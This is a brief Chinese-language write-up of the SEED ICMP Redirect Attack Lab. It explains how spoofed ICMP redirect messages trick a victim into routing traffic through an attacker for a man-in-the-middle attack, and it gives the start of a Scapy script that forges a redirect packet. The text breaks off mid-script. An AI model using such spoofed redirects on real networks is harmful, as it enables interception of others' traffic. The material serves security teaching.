ICMP Redirect Attack Lab(SEED实验)
ICMP重连就是我们伪装的路由器通过报文告诉受害者,发向某个方向的报文不应发给另一个路由器,而应该发给我们,并以此截获受害者的报文,实现MITM
环境配置
Task 1 发起ICMP重连
在目前的Ubuntu系统中已经默认拒绝了ICMP报文的接收,用以防范这种重连攻击。为了复现攻击方式,实验设置已经替我们打开了受害者主机的接收功能:
但同时,受害者主机也已经配置了192.168.60.0/24
的报文发送方向,并不是我们的伪装路由。我们当前的工作就是告诉受害者他的方向错误了。
ICMP报文类型参考,这里应该选择type = 5, code = 0
实验手册提供了一个ICMP_redirect报文骨架,对其进行修改后的执行代码:
#!/usr/bin/python3
from scapy.all import *
Ma_IP = '10.9.0.111'
Router_IP = '10.9.0.11'
Victim_IP = '10.9.0.5'
Network_IP = '192.168.60.5'
ip = IP(src = Router_IP , dst = Victim_IP )
icmp = ICMP(type=5, code=1)# type 5 code 0 for redirect host
icmp